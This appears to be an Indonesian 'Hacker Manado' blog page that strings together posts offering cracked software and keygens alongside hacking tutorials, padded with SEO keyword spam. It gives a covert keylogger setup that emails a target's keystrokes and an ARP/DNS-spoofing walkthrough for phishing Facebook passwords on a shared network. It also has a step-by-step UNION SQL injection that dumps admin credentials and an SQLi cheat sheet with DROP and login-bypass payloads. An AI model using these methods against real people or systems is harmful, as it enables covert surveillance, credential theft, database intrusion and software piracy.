Revo Uninstaller Pro v2.5.5 Full Keygen

selamat malam sahabat hacker,
malam ini saya akan memberikan sebuah aplikasi untuk sahabat hacker yang kesulitan untuk menghapus/uninstal sebuah aplikasi yang sudah terinstal di komputer sahabat hacker.
Revo Uninstaller Pro merupakan suatu aplikasi utilities yang berguna sebagai penghapusan aplikasi dan pembersih sistem komputer seperti sisa file dari proses penghapusan aplikasi. Selain itu Revo Uninstaller Pro juga menyediakan fasilitas seperti pembersihan sisa file sampah (Junk File), Clear Web Browser, Windows Cleaner dan Office Cleaner. Maka dari itu aplikasi ini disebut sebagai aplikasi berbasis utilities.

Features :

• Real-Time installation monitor
• Forced Uninstall
• Advanced scanning for leftovers
• Multi-Level Backup System
• Junk Files Cleaner
• Autorun Manager
• Windows Tools
• Browsers Cleaner
• MS Office Cleaner
• Windows Cleaner
• Evidence Remover
• Unrecoverable Delete

 Revo Uninstaller Pro v2.5.5 Full Keygen

Smadav Pro 8.6 Full Keygen

VIRUS . . . . . !



saya sudah bosan dengan 1 kata 5 huruf itu.
sangat menjengkelkan jika sudah masuk ke komputer kita.

Ramnit . . . !
virus yang terkenal pada sekarang-sekarang ini yang merupakan virus yang bisa menginjeksi file .exe menjadi beberapa bagian, membuat file berjenis shortcut, seperti "Copy of Shortcut to (1).lnk" sampai "Copy of Shortcut to (4).lnk" juga tidak luput dengan folder "RECYCLER" yang bisanya terjadi pada flash disk.


tapi tenang,sahabat hacker tak perlu khawatir.baru baru ini salah satu Anti Virus buatan anak bangsa mengeluarkan versi terbarunya.


SMADAV . . . 


benar, belum lama ini SMADAV merilis versi terbarunya, yaitu Smadav Pro 8.6

Smadav Pro 8.6 merupakan versi lanjutan dari Smadav Pro 8.5 yang telah menambah fitur terbarunya yaitu "Penambahan database 100 virus baru, Penyempurnaan fitur Smadav-Updater, Pendeteksian khusus untuk virus Ramnit, Sality, & OneLetter yang menyebar via USB Flash Disk, dsb."

untuk mengilangkan tanda blacklist pada SMADAV, anda bisa menuliskan kata anti bajakan atau anti pembajakan pada kolom registrasi.


Smadav Pro 8.6 Full Keygen

BlazingTools Perfect Keylogger v1.7.5.0 full

---

selamat malam sahabat hacker,
malam ini saya akan memberikan sebuah software keylogger terbaik 2011.
Fungsi atau kegunaan dari keylogger ini bisa untuk merekam kegiatan komputer, merekam keyboard, merekam desktop, aktifitas mouse, sekaligus merekam waktu kamu browsing. Keylogger yang akan saya kasih adalah keylogger tebaik dan full version.
saya telah mencoba software ini,dan hasilnya berjalan mulus.


Software keylogger ini namanya Perfect Keylogger keluaran dari Blazing Tools.,keylogger ini yang paling baik, tidak terdeteksi oleh antivirus, mudah digunakan dan tidak ribet, bisa digunakan untuk OS windows XP, vista, dan windows 7.

Cara Menggunakan BlazingTools Perfect Keylogger v1.7.5.0 :

• Download dan instal BlazingTools Perfect Keylogger v1.7.5.0
• Klik kanan icon BlazingTools Perfect Keylogger v1.7.5.0 yang berada di system tray.
• Klik Option
• maka akan tampak seperti berikut

• Beri centang "Run On Windows Start Up" (keylogger akan aktif dengan sendirinya bila komputer baru di jalankan)
• Untuk kenyamanan dan keamanan, saya sarankan untuk mengganti tombol hotkey nya. (Digunakan untuk meng hiden/menampilakan icon keylogger)
• Selesai
• Untuk melihat rekaman nya, silhkan masuk ke "View The Log"

Untuk pengaturan mengirim log ke email sahabat hacker bisa mengikuti langkah berikut

•  Jika sudah terinstal dan tersetting dengan baik, klik kanan pada icon keylogger kanan bawah desktop.
•  Lalu klik option, dan akan muncul beberapa pilihan, pilih E-Mail.
•  Akan ada 2 konten, scheduler dan delivery.
•  Pada bagian scheduler, centang kotak pada "Try to send logs by email every"
•  Dan pada pilihan Delivery, pada bagian "send to" masukan alamat email kamu untuk menerima kiriman emailnya dari komputer target.
•  Untuk SMTP server, masukan SMTP provider dari email kamu.
•  PENTING! untuk mengaktifkan SMTP, Tentu saja harus diaktifin dulu fiturnya dari akun email mu sendiri. Dan saya rekomendasikan memakai yahoo saja, dengan akun email embel-embel belakangnya co.id, jangan memakai yang .com!!
• Contoh: bagi pengguna provider yahoo, biasanya servernya "smtp.mail.yahoo.co.id"
•  Biarkan port numbernya tetap 25.
•  User name dan password masukan. User name dan password didapat sewaktu kamu mengaktifkan SMTP di yahoo kamu.
•  Authentication Method pilih AUTH LOGIN.
•  Klik ok, dan untuk mencoba nya klik send.

 BlazingTools Perfect Keylogger v1.7.5.0 full

Tutorial Akses Situs Yang Diblokir

selamat sore menjelang malam sahabat hacker,
kali ini saya akan memberikan Tutorial Akses Situs Yang Diblokir oleh nawala (DNS).

sebelum melanjutkan pada topik pembahasan tadi,ada baiknya sahabt hacker mengenal terlebih dahulu tentang Nawala atau DNS.

Nawala (DNS) adalah salah satu layanan sistem penyaring berdasarkan nama Domain Name System yang didukung oleh berbagai pihak, yaitu pelaku bisnis warnet, Kemkominfo, dan PT. Telkom sebagai BUMN penyedia jasa layanan internet di Indonesia.
DNS Nawala secara spesifik menyaring segala jenis konten negatif, seperti Pornografi, Judi, situs Phising (penyesatan) serta situs yang mengandung Malware (software berbahaya).

Efek pemblokiran :

Efek menghindari pemblokiran :

Well, bagaimana untuk menghindari pemblokiran tersebut?
Intinya adalah kita harus mengganti DNS nawala dengan DNS lain. Bisa menggunakan layanan OpenDNS dan sebagainya. Disini saya akan share dengan menggunakan tool yang bernama DNS Jumper karena simple dan mudah untuk digunakan.

Cara menggunakan DNS Jumper :

1. Download DNS Jumper
2. Ekstrak (keluarkan file dari zip) ke desktop atau kemana aja.
3. Jalankan DNS Jumper
4. Pilih Network card (sesuaikan dengan komputer anda)
5. Pilih DNS Service yang akan kita gunakan di menu dropdown.
6. Klik apply DNS.
7. Done.

DNS Jumper
selamat mencoba

Kaspersky Key Changer

kali ini saya akan memberikan tutorial mengganti serial key kaspersky bagi yang belum tau cara ganti serial key kaspersky dengan cara manual.
untuk mempermudah sahabat hacker untuk mengganti serial key kasperskynya yang sudah di blacklist oleh security kaspersky.

Sebelum menggunakan aplikasi ini pastikan bahwa sahabat hacker sudah menghapus key Kaspersky yang sebelumnya sudah tepasang atau sudah terkena blacklist.

Cara menggunakan Kaspersky Key Changer :

1. Sediakan key Kaspersky sesuai versi dan juga yang belum terkena blacklist
2. Masuk kedalam program Kaspersky Key Changer
3. Buka file yang berisi key Kaspersky
4. Drag and drop key Kaspersky kedalam kotak Kaspersky Key Changer
5. Selesai

Kaspersky Key Changer  

Kaspersky AntiVirus dan Internet Security 2012 full

Untuk sahabat hacker manado yang ingin mencoba menggunakan Kaspersky AntiVirus dan Internet Security 2012 sekarang bisa langsung download disini software full versionnya secara gratis.
saya telah mencoba menggunakan software ini.
pada versi 2011 kali ini Kaspersky AntiVirus dan Internet Security 2012 terlihat lebih simple dan lebih ringan penggunaannya.

Features of Kaspersky Internet Security 2012 :

• Kaspersky URL Advisor
• Kaspersky File Advisor
• System Watcher
• Application Control
• Safe Run Mode
• Two-way personal firewall
• Anti-Phishing and Anti-Spam technology
• Parental Control
• Completely redesigned interface

bagaimana?
tertarik untuk menggunakannya?
silahkan langsung saja download Kaspersky AntiVirus dan Internet Security 2012 pada link dibawah ini.

Kaspersky AntiVirus 2012

Kaspersky Internet Security 2012
Key  Kaspersky AntiVirus dan Internet Security 2012  [30 september 2011]




untuk cara menggunakan Key tersebut saya akan paparkan dalam posting berikutnya.

Tutorial Hacking Facebook dengan Sniffing Jaringan

hehe,
selamat sore sahabat  hacker manado, kali ini saya akan mencoba memberikan Tutorial Hacking Facebook dengan metode Sniffing Jaringan.
 untuk sahabat hacker yan ingin mencoba silahkan mengikuti langkah demi langkah yang akan saya paparkan dibawah ini.

sebelum memulai sebaiknya sahabt hacker mempersiapkan alat dan perlengkapan tempur terlebih dahulu.

1. XAMPP Server

2. Cain & Abel
3. File Peretas



setelah semua perlengkpan siap,mari kita lanjutkan kisahnya.

1. buka Instal XAMPP dan buka

2. buka command prompt dan ketikan ipconfig kemudian enter.

catat ip anda dan gateway yang muncul.
misal :
IP: 192.168.1.20
Gateway: 192.168.1.1

4. buka cain & abel

5. klik tombol start/stop APR

6 Pilih Adapter yang ingin digunakan, kemudian tekan OK

7. Klik kembali tombol start/stop APR seperti yang tadi

8. Klik tab Sniffer kemudian klik kanan -> Scan MAC Address

tekan OK saja dan proses scanning akan berjalan,tunggu hingga selesai.

9. Kemudian klik tab APR pada bagian paling bawah

10. Klik pada area table yang percis dengan gambar di bawah ini.

11. Jika sudah di klik, maka akan muncul tandah + pada bagian atas tab sniffer.

12. Klik tanda + tersebut
13. Kemudian klik IP Address komputer lain yang 1 jaringan pada table sebelah kiri.

14. Dilanjutkan dengan mengklik gateway yang kita dapat tadi pada table sebelah kanan

15. Klik OK
16. Jika berhasil, maka sebuah IP akan masuk pada tabel sniffer

17. Lakukan hal serupa pada semua IP Address kecuali IP Gateway dan IP komputer kita

18. Tidak harus semua IP, Anda juga bisa hanya menambah IP tertentu
Buka folder C:\xampp\htdocs\ kemudian hapus file index.html dan index.php

19. Jika sudah, buka folder Peretas yang sudah anda download tadi kemudian copy semua file yang ada di dalamnya ke folder C:\xampp\htdocs\

20. Ketikan localhost pada browser Anda untuk memastikan bahwa Fake Facebook berhasil di instal
di komputer Anda

21. Kembali ke Cain n abel kemudian klik APR-DNS pada tabs Sniffer

22. Klik tombol +

23. Pada DNS Name Requested masukkan alamat www.facebook.com
24. Pada IP address to rewrite in response packets masukkan alamat IP komputer Anda

25. klik OK

26. Jebakan berhasil di Instal, Anda tinggal menunggu kiriman email beserta password facebook dari
komputer-komputer yang berada 1 jaringan dengan Anda

27. Untuk melihat hasil, ketikkan localhost/logs.txt pada browser Anda

selamat mencoba Tutorial Hacking Facebook dengan Sniffing Jaringan ini dan gunakanlah dengan bijak.

ACDSee Pro v5.0.110 Incl Keymaker-CORE

Untuk sahabat hacker manado yang mau belajar desain grafis,kali ini saya akan memberikan sebuah software gratis yang sudah full version untuk anda para hacker yang ingin menjadi belajar desain grafis.
nama software ini adalah :

 
ACDSee Pro v5.0.110 Incl Keymaker-CORE

Deskripsi: ACDSee Pro v5.0.110 Incl Keymaker-CORE adalah aplikasi penting untuk mendapatkan, mengorganisasi, melihat, meningkatkan dan berbagi foto digital Anda dan file media lainnya. Browser ACDSee Pro v5.0.110 Incl Keymaker-CORE yang memungkinkan Anda menyalin foto dari kamera ke komputer Anda, mengkategorikan dan menilai file Anda, dan mengatur koleksi foto dari berbagai ukuran - dari beberapa ratus hingga beberapa ratus ribu. Memilih untuk melihat preview thumbnail dari berbagai ukuran, atau menggunakan daftar terperinci file properti untuk mengurutkan file Anda. Tidak dapat menemukan foto tertentu? Tidak masalah - ACDSee Pro v5.0.110 Incl Keymaker-CORE mencakup berbagai alat-alat pencarian yang kuat dan Gambar Bandingkan fitur untuk menghilangkan duplikasi.

untuk yang mau mencoba  ACDSee Pro v5.0.110 Incl Keymaker-CORE ini silahkan download di bawah ini.

ACDSee Pro v5.0.110 Incl Keymaker-CORE



Tutorial hacker,cara menjadi hacker,software hacker 2011,hacker tutorial,tutorial menjadi hacker,tutorial hacker 2011,ilmu hacker,dunia hacker,ebook hacker,be a hacker,want to hack,how to hack,cara hack,

[Tutorial Hacking]SQL Injection Step By Step (For Dummies)

selamat siang sahabat Hacker Manado.
sore ini saya akan memberikan tutorial hacking dengan cara SQL Injection,
sebelum melangkah lebih jauh mari kita simak lebih dahulu tentang SQL injection.

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :


http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .

Tutorial hacking,ilmu hacking,dunia hacking,web category,menjadi hacker,be hackeron facebook,How to Hack,free download,what is .net,gmail,download free,what is software,software for,software to,software de,word,free downloads,software programs,application,hacker,tips dan trik hacking, tutorial hacking, tools hacking, hacker manado, manado hacker, team hacker manado, software hacking,ilmu komputer,tips dan trik SEO,facebook,twitter,tips dantrik twitter,hack facebook,hack twitter,Hacking website,hack traffic blogger,city guide,manado,travel reviews,PC computers,laptop,notebook,computer pc,QExKrrTlbT1GibyKNb88rDqHAWM' name

Microsoft Windows 8 Developer Preview English, 32-bit (x86)

ini dia yang terbaru dari microsoft coorporation,
setelah sekian lama menanti akhirnya Microsoft Windows 8 Developer Preview English, 32-bit (x86) kini di publish.



Size: 2,825 MB

Persyaratan Sistem
Pratinjau Pengembang jendela karya-karya besar pada hardware yang sama bahwa kekuatan Windows Vista dan Windows 7:

1 gigahertz (GHz) atau lebih cepat 32-bit (x86) atau 64-bit (x64) processor
1 gigabyte (GB) RAM (32-bit) atau 2 GB RAM (64-bit)
16 GB Tersedia ruang hard disk (32-bit) atau 20 GB (64-bit)
Perangkat grafis DirectX 9 dengan WDDM driver 1.0 atau lebih tinggi
Mengambil keuntungan dari input sentuhan memerlukan layar yang mendukung multi-touc

part 1
part 2
part 3
part 4
part 5
part 6
part 7
part 8
part 9
part 10
part 11
part 12
part 13
part 14
part 15 

on facebook,How to Hack,free download,what is .net,gmail,download free,what is software,software for,software to,software de,word,free downloads,software programs,application,hacker,tips dan trik hacking, tutorial hacking, tools hacking, hacker manado, manado hacker, team hacker manado, software hacking,ilmu komputer,tips dan trik SEO,facebook,twitter,tips dantrik twitter,hack facebook,hack twitter,Hacking website,hack traffic blogger,city guide,manado,travel reviews,PC computers,laptop,notebook,computer pc

Uniblue PowerSuite 2011 v3 0 4 4 Multilingual incl Serial

Uniblue PowerSuite 2011 v3 0 4 4 Serial termasuk Multibahasa

PowerSuite - adalah solusi lengkap untuk kinerja komputer Anda. MergingRegistryBooster, DriverScanner dan SpeedUpMyPC dalam antarmuka tunggal, meningkatkan PowerSuite dan perlindungan terhadap kelompok rentan, tapi sangat importantelement sistem terikat dengan kecepatan dan stabilitas.

anda bisa download gratis Uniblue PowerSuite 2011 v3 0 4 4 Multilingual incl Serial disini
hanya di blog ini,
hanya di System [B]

Uniblue PowerSuite 2011 v3 0 4 4 Multilingual incl Serial

on facebook,How to Hack,free download,what is .net,gmail,download free,what is software,software for,software to,software de,word,free downloads,software programs,application,hacker,tips dan trik hacking, tutorial hacking, tools hacking, hacker manado, manado hacker, team hacker manado, software hacking,ilmu komputer,tips dan trik SEO,facebook,twitter,tips dantrik twitter,hack facebook,hack twitter,Hacking website,hack traffic blogger,city guide,manado,travel reviews,PC computers,laptop,notebook,computer pc 

Adobe Photoshop Lightroom v3.5 Multilingual Incl Keymaker-CORE

Keterangan:
Adobe Photoshop Lightroom 3 perangkat lunak membantu Anda membawa keluar yang terbaik dalam foto Anda, apakah Anda menyempurnakan satu gambar, mencari sepuluh, pengolahan ratusan, atau mengorganisir gambar thousands.Create yang luar biasa yang menggerakkan audiens Anda. Percobaan tanpa rasa takut dengan negara-of-the-art alat editing tak rusak. Mudah mengelola semua gambar Anda. Dan memamerkan karya Anda di layout cetak elegan, menunjukkan slide, dan galeri web, serta pada populer situs berbagi foto. Semua dari dalam satu aplikasi cepat, intuitif.

Versi 3.5:

Adobe Photoshop Lightroom 3.5 pembaruan meliputi perangkat tambahan:

     * Dukungan kamera tambahan untuk lebih dari 20 model kamera baru termasuk Nikon Coolpix P7100, Olympus E-PL3 dan Sony SLT-A77
     * Koreksi untuk masalah diperkenalkan di versi sebelumnya dari Lightroom 3

part 1
part 2

on facebook,How to Hack,free download,what is .net,gmail,download free,what is software,software for,software to,software de,word,free downloads,software programs,application,hacker,tips dan trik hacking, tutorial hacking, tools hacking, hacker manado, manado hacker, team hacker manado, software hacking,ilmu komputer,tips dan trik SEO,facebook,twitter,tips dantrik twitter,hack facebook,hack twitter,Hacking website,hack traffic blogger,city guide,manado,travel reviews,PC computers,laptop,notebook,computer pc

Adobe Photoshop Elements v10.0 MacOSX Incl Keymaker-CORE

Keterangan:
Adobe ® Photoshop ® Elements 10 - versi terbaru dari konsumen # 1 software1 mengedit foto - membantu Anda mengubah kenangan sehari-hari menjadi foto sensasional Anda akan menghargai selamanya. Mudah mengedit foto dan membuat kreasi foto menggunakan opsi otomatis, berbagi foto dengan jaringan sosial Anda, dan melihat foto hampir di mana saja Anda berada. Pemenang penghargaan selama 10 tahun! Kita semua memiliki pengalaman kehilangan momen spesial karena gangguan dalam foto kita. Dengan perangkat lunak Adobe ® Photoshop ® Elements 10, Anda langsung dapat menghapus objek yang tidak diinginkan atau cepat Ubah komposisi foto Anda dengan ukuran apapun. Atau hanya cat pada 1 dari 30 efek baru untuk mencapai hanya terlihat benar. Dengan cara itu Anda akan memiliki gambar yang sempurna untuk memberikan sebagai hadiah khusus atau berubah menjadi kreasi menyenangkan. Kenangan berharga Anda layak tidak kurang dari kesempatan untuk membuat mereka luar biasa, dengan Photoshop Elements.

part 1
part 2
part 3
part 4
part 5

on facebook,How to Hack,free download,what is .net,gmail,download free,what is software,software for,software to,software de,word,free downloads,software programs,application,hacker,tips dan trik hacking, tutorial hacking, tools hacking, hacker manado, manado hacker, team hacker manado, software hacking,ilmu komputer,tips dan trik SEO,facebook,twitter,tips dantrik twitter,hack facebook,hack twitter,Hacking website,hack traffic blogger,city guide,manado,travel reviews,PC computers,laptop,notebook,computer pc

Havij 1.15 Pro Full

Selamat malam sobat hacker manado, malam ini saya akan memberikan kepada anda sebuah software untuk melakukan proses SQL Injection.

fitur baru dari havij 1.15 :

•      Webknight memotong WAF ditambahkan.
•      Mod_security Melewati dibuat lebih baik
•      Ditambahkan dukungan Unicode
•      Sebuah metode baru untuk tabel / kolom di MSSQL ekstraksi
•      Melanjutkan tabel sebelumnya / kolom ekstraksi tersedia
•      Pengganti kustom ditambahkan ke pengaturan
•      Nilai default injeksi ditambahkan ke pengaturan (bila menggunakan%% Inject_Here)
•      Tabel dan awalan kolom ditambahkan untuk suntikan buta
•      Tabel kustom dan daftar kolom menambahkan.
•      Waktu kustom ditambahkan.
•      Sebuah situs md5 cracker baru ditambahkan
•      bugfix: bug releating untuk SELECT perintah
•      bugfix: kolom string yang menemukan
•      bugfix: mendapatkan data kolom multi MSSQL
•      bugfix: mysql menemukan urutan kolom
•      bugfix: salah sintaks dalam jenis injeksi string di MSAccess
•      bugfix: hasil positif palsu telah dihapus
•      bugfix: ekstraksi data dikodekan di url-halaman
•      bugfix: memuat disimpan proyek
•      bugfix: beberapa kesalahan dalam ekstraksi data di MSSQL tetap.
•      bugfix: bug di MSAccess ketika menebak tabel dan kolom
•      bugfix: bug saat menggunakan proxy
•      bugfix: bug memungkinkan remote desktop di windows server 2008 (terima kasih kepada pegasus315)
•      bugfix: positif palsu dalam mencari kolom jumlah
•      bugfix: saat kesalahan metode berbasis MSSQL gagal
•      bugfix: bug dalam menyimpan data
•      bugfix: Oracle dan PostgreSQL deteksi  

Software ini sudah di crack dan siap digunakan, jadi sahabat hacker tinggal menggunakanya saja.
dan untuk menjadikannya full versi sahabat hacker tinggal klik tombol register saja.


langsung saja download disini :
Havij 1.15 Pro Full

Mini KMS Activator v1.31 Office 2010

selamta malam sahabat hacker manado, kali ini saya akan memberikan sebuah software bagi anda yang menggunkan Microsoft Office 2010 yang versi trial.
software ini berguna untuk menjadikan Microsoft office 2010 anda menjadi full version.

ini buktinya:

Featured :

• Optimized detect Office 2010 products on 64 edition of Windows.
• Setting of counter of rearms Office 2010 (counter is working for the rearms made with activator only).
• Install/Uninstall KMS emulator as Windows service without Command window.
• KMS emulator installation process is modified.
• The conflict with firewall is eliminated at run once KMS emulator.
• Function of copying of a path to the KMS emulator's file for adding in exceptions of Anti-Virus software.
• Internal errors reporting (eg: if activator components are blocked by antivirus software).
• Improved checking whether activator is running on behalf of administrator.
• Activator code optimization.

download disini
Mini KMS Activator v1.31 Office 2010 full

Software Serial Hunter

Anda menggunakan software trial?
tidak punya serial number?

tidak usah bingung.
hari ini saya akan membagikan anda sebuah software pencari serial number.
Tolls ini berfungsi untuk mencari serial number software anda dan menjadikannya Full Version secara gratis.

langsung saja menuju tempat download bagi sobat Hacker yang membutuhkan tools ini

download disini -----> Hacker Manado



Hacker Manado

Wireless Hacking Tools

kali ini Hacker Manado mau memberikan sobat Hacker sebuat tools yang bisa di gunakan untuk melakukan hacking Wireless.
Cara penggunaannya cukup mudah,dan saya rasa saya tidak perlu menjelaskan secara panjang lebar tentang cara penggunaannya.

jadi langsung saja menju tempat download.

download disini -----> Hacker Manado

Hacker Manado

CheatSheet SQL injection PART 1

Kali ini saya akan memberikan CheatSheet SQLI sebagai basic bagi anda yang mau belajar menjadi Hacker dengan teknik SQL Injection,
Ini adalah perintah perintah yang digunakan dalam melakukan SQLI saat proses Hacking.
Saat ini hanya untuk MySQL dan Microsoft SQL Server. Sebagian besar sampel tidak benar untuk setiap situasi tunggal. Sebagian besar lingkungan dunia nyata bisa berubah karena kurung, basis kode yang berbeda dan kalimat SQL.

Sampel disediakan untuk memungkinkan pembaca untuk mendapatkan ide dasar dari serangan potensial.

* M : MySQL
* S : SQL Server
* O : Oracle
* + : Possibly all other databases

Contoh;
(MS) MySQL dan SQL Server dll
(M * S) Hanya dalam beberapa versi MySQL atau kondisi khusus lihat terkait catatan dan SQL Server
Sintaks Referensi dengan Serangan Sampel Dasar
Akhir / Mengomentari Komentar Out Line / Queries
Line Komentar

(Komentar sisa query)

Komentar Line umumnya berguna untuk mengabaikan sisa query sehingga Anda dapat meninggalkan sejenak untuk memperbaiki seluruh query.

* — (SM)
DROP sampletable;–

* # (M)
DROP sampletable;#

Sampel Serangan SQL Injection.

* Username: admin’–
* SELECT * FROM members WHERE username = ‘admin’–’ AND password = ‘password’
Anda akan sebagai user admin, karena akhir dari query SQL akan diabaikan.

Inline Komentar

Komentar akhir query dengan tidak menutup atau menggunakannya untuk melewati daftar blacklisting, menghapus spasi, obfuscating dan menentukan versi database.

* /*Komentar Disini*/ (SM)
o DROP/*Komentar*/Contoh tabel
o DR/**/OP/*bypass blacklisting*/Contoh tabel
o SELECT/*avoid-spaces*/password/**/FROM/**/Members

* /*! MYSQL Special SQL */ (M)
Ini adalah sintaks komentar khusus untuk MySQL. Hal ini sempurna untuk mendeteksi versi MySQL. Jika Anda menempatkan kode ke dalam komentar itu anda akan mengeksekusi di MySQL. Anda juga dapat menggunakan ini untuk mengeksekusi beberapa kode hanya jika server lebih tinggi dari versi yang disediakan.

SELECT /*!32302 1/0, */ 1 FROM tablename

Contoh Serangan SQL Injection

* ID: /*!32302 10*/
* ID: 10
Anda akan mendapatkan respon yang sama jika versi MySQL lebih tinggi dari 3.23.02

Stacking Queries/Penumpukan Query

Menjalankan lebih dari satu permintaan dalam satu transaksi. Hal ini sangat berguna di setiap titik injeksi, khususnya di SQL Server back ended aplikasi.

* ; (S)
SELECT * FROM members; DROP members–

Query berakhir dan mulai yang baru.

*Tentang MySQL dan PHP;
Untuk memperjelas beberapa masalah;
PHP - MySQL tidak mendukung permintaan ditumpuk, Java tidak mendukung query ditumpuk (saya yakin untuk ORACLE,tapi tidak begitu yakin tentang database lainnya). Biasanya query MySQL mendukung ditumpuk tetapi karena lapisan database di sebagian besar konfigurasi itu berbeda jadi tidak mungkin untuk mengeksekusi query kedua dalam satu aplikasi PHP-MySQL atau mungkin MySQL klien mendukungan ini,saya tidak yakin. Dapatkah seseorang menjelaskan itu?
Contoh Serangan SQL Injection

* ID: 10;DROP members –
* SELECT * FROM products WHERE id = 10; DROP members–

Hal ini akan menjalankan anggota DROP dari SQL setelah Query SQL normal.
if statements

Dapatkan jawaban berdasarkan if statements adalah salah satu poin kunci dari Blind SQL Injection dan dapat sangat berguna untuk menguji hal-hal sederhana.
MySQL If Statement

* IF(condition,true-part,false-part) (M)
SELECT IF(1=1,’true’,'false’)

SQL Server If Statement

* IF contidion true-part ELSE false-part (S)
IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’

Contoh Serangan SQL Injection

if ((select user) = ’sa’ OR (select user) = ‘dbo’) select 1 else select 1/0 (S)
Ini akan melemparkan sebuah pembagi dengan nol kesalahan jika user login saat itu tidak "sa" atau "dbo".
Menggunakan Integer

Berguna untuk melewati, magic_quotes () dan filter serupa, atau bahkan WAFs.

* 0xHEXNUMBER (SM)
Anda dapat menulis hex seperti ini;

SELECT CHAR(0×66) (S)
SELECT 0×5045 (ni bukan integer tapi string dari Hex) (M)
SELECT 0×50 + 0×45 (ini integer sekarang!) (M)

String Operations/Operasi String

String terkait operasi. Hal ini dapat sangat berguna untuk membangun injeksi yang tidak menggunakan tanda kutip, bypass setiap black listing lainnya atau menentukan database.

String Concatenation/Penggabungan String

* + (S)
SELECT login + ‘-’ + password FROM members

* || (*MO)
SELECT login || ‘-’ || password FROM members

*About MySQL `||`;
Jika MySQL bekerja dalam mode ANSI itu akan bekerja tetapi dinyatakan MySQL menerimanya sebagai operator logis `` itu akan kembali seperti semula. Lebih baik cara untuk melakukannya adalah dengan menggunakan CONCAT () fungsi di MySQL.

* CONCAT(str1, str2, str3, …) (M)
Menggabungkan string disediakan.
SELECT CONCAT(login, password) FROM members

String tanpa tanda kutip

Ini adalah beberapa cara langsung menggunakan string tapi ini selalu mungkin untuk menggunakan CHAR () (MS) dan CONCAT () (M) untuk menghasilkan string tanpa tanda kutip.

* 0×457578 (M) - Hex Representation of string/Representasi string
SELECT 0×457578
Ini akan dipilih sebagai string di MySQL.

* Using CONCAT() in MySQL
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
Ini akan mengembalikan ¡®KLM¡¯.

* SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
Ini akan mengembalikan ¡®KLM¡¯.

String Modification & Related/Memodifikasi & Mengaitkan String

* ASCII() (SM)
Mengembalikan nilai ASCII karakter paling kiri. Harus memiliki fungsi untuk Suntikan Blind SQL.

SELECT ASCII(’a')

* CHAR() (SM)
Mengkonversi sebuah integer dari ASCII.

SELECT CHAR(64)

UNION ¨C Memperbaiki Masalah Bahasa

